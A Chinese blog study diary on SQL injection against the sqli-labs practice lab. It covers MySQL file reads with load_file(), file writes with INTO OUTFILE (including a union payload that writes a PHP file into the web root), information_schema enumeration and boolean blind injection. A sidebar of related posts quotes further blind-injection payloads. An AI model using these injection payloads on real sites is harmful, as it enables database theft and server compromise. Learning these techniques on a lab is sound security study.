渗透学习日记day13(补布尔盲注)

最新推荐文章于 2022-05-30 09:08:18 发布
最新推荐文章于 2022-05-30 09:08:18 发布
阅读量2.2k 收藏
点赞数
分类专栏: # 打卡学习记录 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44836237/article/details/121784436
版权

secure-file-priv参数

首先在mysql中使用 

show variables like '%secure_file_priv%';

show global variables like '%secure_file_priv%';        

如果显示为NULL

在mysql.ini的配置文件中加入 

secure_file_priv=

 现在即可使用file_load读取文件,如果secure_file-priv=NULL则读取内容为空

注意如果在secure_file-priv=    后加的是文件夹的绝对路径,则只能读取该文件夹中的文件

select file_load('文件绝对路径')

关于secure_file-priv= 要加在[mysqld]下面

load_file()函数 读文件操作

前提:

  • 知道文件绝对路径
  • 能够使用union查询
  • 对想要读取的目录有读写权限,判断mysql是不是root
  • my.ini中的secure-file-priv配置

load_file()中避免使用单双引号:

load_file(0x后面跟绝对路径的十六进制编码)        //这样可以避免使用单双引号

into outfile()写文件操作

用法:select '要写入的内容' into outfile '要写入文件的绝对路径';

例如:select '<?php phpinfo();?>' into outfile 'D:/1.txt';

这里有个小疑问是视频中读文件用的是(' 读取路径 ')而写文件用的是' 要写的路径 '没有(),但是自己在测试的时候出现问题,没有测试过两者区别

问题出现原因:mysql5.7版本secure_file-priv= 加错地方,要加在my.ini配置文件的[mysqld]下

而且查看命令要用show global variables like '%secure_file-priv%'; 

mysql5.7导出数据提示--secure-file-priv选项问题的解决方法

找到这里出错原因了:打成了secure_file-priv,是secure_file_priv

可以看到Mysql5.7版本要加个global

问题解决,之前的问题||视频中读文件用的是(' 读取路径 ')而写文件用的是' 要写的路径 '没有()||

验证发现确实是这样,不然会报错

 

补充:phpstudy内置的mysql要用命令行执行的话首先进入Mysql的可执行的文件夹下D:\phpstudy_pro\Extensions\MySQL5.7.26\bin(根据自己安装路径)再打命令mysql -u ... root -p

into dumpfile()写文件操作

和into outfile()相同,只是这里写的是二进制可执行程序,用记事本打开会乱码

sqli-labs第一关在www目录下写文件

?id=' union select 1,2,'<?php phpinfo();?>' into outfile 'D:/phpstudy_pro/WWW/1.php' --+

sqli-labs第一关查看当前数据库中users表的所有字段(已知有三个字段,第2.3位为回显位)

?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users' --+

关于information_schema

读取所有数据库:

information_schema.schemata--schema_name       里面的schema_name就是所有数据库

select * from information_schema.schemata;

 读取某个库下面某张表的所有内容:

information_schema.tables table_name where table_schema=数据库名        里面的table_name就是数据库中所有的表

select * from information_schema.tables where table_schema=database();

 读取某个数据库下某张表所有字段:

select column_name from information_schema.columns where table_schema = database() and table_name = '表名';

布尔盲注

我们注入一般是先看是否有回显点先用联合注入,再看是否有报错用注入,再考虑布尔盲注,最后是延时注入

我认为布尔注入和延时注入的话主要是对数据库、表名等信息字符进行循环遍历匹配爆出相对于的信息

因为直接做布尔注入的时候没有写,之后若是遗忘了了可以看看下面的文章,这里留个回顾知识点的地方

SQL盲注注入——布尔型_莫者的博客-CSDN博客_布尔盲注

XiXioo1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql盲注 解决_SQL注入之基于布尔盲注详解
weixin_39638086的博客
12-19 535
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
SQL注入之布尔盲注
DM766924的博客
09-13 1564
什么是布尔判断SQL注入? “布尔判断”指的是利用SQL语句**逻辑与(and)**操作,判断and两边的条件是否成立,SQL语句带入输入库查询后判断返回内容(通常返回值仅有非空和空两种状态),类似布尔型的true和false的两种状态。 布尔盲注步骤: 第1步:确认注入点 方法:通过增加 ’ 和增加--+注释符,语句从执行失败变为执行成功判断注入点 第2步:判断数据库版本 方法:主要因为5.0版本以下没有information_schema数据库,无法进行手动注入; 由于无法回显数据,利用逻辑
不再显示错误的盲注布尔盲注和时间盲注
qq_44111753的博客
11-25 215
Blind SQL (盲注) : 是注入攻击的其中一种, 向数据库发送 true 或 false 这样的问题, 并根据应用程序返回的信息判断结果. 这种攻击的出现是因为应用程序配置为只显示常规错误, 但并没有解决SQL 注入存在的代码问题. 1、发现盲注 正常输入和错误输入的结果是不一样的,但不会显示报错 2、基于时间的盲注 id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),0) --+ if(expr1,expr2,expr3)若表.
墨者学院SQL注入漏洞测试(布尔盲注)
痴人说梦梦中人
11-13 448
1、 使用SQLmap,爆库,爆表,爆列,dump,md5解密获得密码登陆,获取key 2、 爆库 爆表 爆列 Dump Md5解密: 登陆获取key 3.修复建议 对sql语句进行以下处理: 1、 sql语句预编译 2、 检查变量数据类型和格式 3、 过滤特殊字符 4、 转译特殊符号 ...
布尔盲注初体验
qq_46041723的博客
03-07 145
了解布尔盲注 布尔盲注的条件 布尔盲注在注入时不会显示具体的信息,即没有显示位,只会返回对或者错误。 布尔盲注需要用到的几个函数 length()函数可返回字符串的长度 substring()函数可以截取字符串,可指定开始的位置和截取的长度 ord()函数可以返回单个字符的ASCII码 char()函数可将ASCII码转换为对应的字符 在上面ord()也可以用ascii()来代替,效果一样。 布...
springboot学习笔记day13.xmind
04-21
springboot学习笔记day13.xmind
Java学习路线:day13
01-20
文章目录第四章 面向对象(中)面向对象特征之三:多态性向下转型的使用多态性的练习Object 类的使用Object类中的主要结构==操作符与equals方法重写equals()方法的原则toString的使用包装类(Wrapper)的使用单元测试...
day3_php审计学习day1_
10-01
在PHP审计学习的第一天,我们将深入探讨PHP编程的基础知识,为后续更高级的主题打下坚实的基础。PHP(Hypertext Preprocessor)是一种广泛使用的开源脚本语言,特别适合于Web开发,可嵌入到HTML中使用。这篇学习日志...
学习JavaEE的day13
最新发布
03-01
在"Day13"的学习中,你可能会接触到以下几个关键知识点: 1. **Servlet与JSP**:Servlet是Java EE中的核心组件,用于处理HTTP请求。它们是服务器端的Java程序,可以动态生成HTML响应。JSP(JavaServer Pages)则是...
python日记Day13——matplotlib之入门
01-20
python日记——matplotlib之入门 matplotlib是python优秀的数据可视化第三方库,matplotlib库由各种可视化类构成,内部结构复杂,受Matlab启发matplotlib.pyplot是绘制各类可视化图形的命令子库,相当于快捷方式 小...
mysql 5.7导数据报错 --secure-file-priv 处理
Hehuyi_In的博客
08-21 1643
mysql可使用 into outfile 参数把表中数据导出到csv,例如可用以下命令把user表的数据导出到user.csv select * from user into outfile '/tmp/user.csv' fields terminated by ',' optionally enclosed by '"' lines terminated by '\r\n'; 1 执行后,user表的数据会导出到/tmp/user.csv。 参数说明: into outfile ‘导出的目录和文
web安全之SQL注入(三)
Longwaer
02-16 747
通过文章详细学习SQL注入的各种场景,了解掌握SQL注入的原理及检测方式,更好用于渗透测试。
导出数据提示--secure-file-priv选项问题的解决方法
jacklin_01的博客
05-30 6711
mysql可使用into outfile参数把表中数据导出到csv,例如可用以下命令把user表的数据导出到user.csv 1 select * from user into outfile '/tmp/user.csv' fields terminated by ',' optionally enclosed by '"' lines terminated by '\r\n 执行后,user表的数据会导出到/tmp/user.csv。 参数说明: int..
mysql secure file_mysql secure-file-priv选项问题的解决方法
weixin_32301287的博客
01-19 989
mysql可使用 into outfile 参数把表中数据导出到csv,例如可用以下命令把user表的数据导出到user.csvselect * from user into outfile '/tmp/user.csv' fields terminated by ',' optionally enclosed by '"' lines terminated by '\r\n';执行后,user表...
布尔盲注
weixin_43271438的博客
10-03 4010
布尔盲注一般是在网页没有报错,回显的时候使用。只能对url输入的判断一个对错,一般一次只能判断一个英文字符 基于布尔盲注(Boolean-based blind SQL injection),即可以根据返回页面判断条件真假的注入。比如对参数加一个’ and ‘1’=‘1和’ and ‘1’='2,如果第一个能查询出来,第二个不行,则说明可以注入,后面可以根据字段and exist(…)不断猜测...
sqli-labs-less-5布尔盲注+错误注入(超详细,小白专属)
yzcn
10-26 937
Less-5 判断注入点: http://127.0.0.1/sqli-labs-master/Less-5/?id=1 正常显示,但是与前四关不同,这里只有一句话:you are in, http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ 显示错误,错误:’‘1’’ LIMIT 0,1’,多了一个单引号, http://127.0.0.1/sqli-labs-master/Less-5/?id=1’–+ 将单引号注释后,显示正常,继续返回一句话you are
mysql5.7导出数据提示--secure-file-priv选项问题的解决方法
热门推荐
傲雪星枫
11-25 8万+
本文将介绍mysql5.7新特性--secure-file-priv的使用及限制导入导出的设定,提供完整调试过程及解决方法。
MySQL导出查询数据出现--secure-file-priv选项问题
小景的博客
05-13 6426
一、问题描述 Windows平台的MySQL5.7.12版本使用以下命令导出查询结果到Excel文件时,会出现问题 select sid, sname, age from student into outfile 'D:/Files/student.xlsx'; ERROR 1290 (HY000): The MySQL server is running with the --secu...
mysql5.7导出数据,mysql5.7导出数据提示--secure-file-priv选项问题的解决方法
weixin_42504858的博客
03-17 280
mysql可使用 into outfile 参数把表中数据导出到csv,例如可用以下命令把user表的数据导出到user.csvselect * from user into outfile '/tmp/user.csv' fields terminated by ',' optionally enclosed by '"' lines terminated by '\r\n执行后,user表的数...
"苏国勇 C语言学习笔记Day11:编程环境介绍与Linux常用命令
苏国勇是一位热爱学习C语言的学生,他对于学习C语言的态度非常认真,始终保持着学习的热情和勤奋。在学习过程中,他养成了一些良好的学习习惯,比如认真听课、下课梳理每天的课程内容以及早睡早起等。这些习惯不仅...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值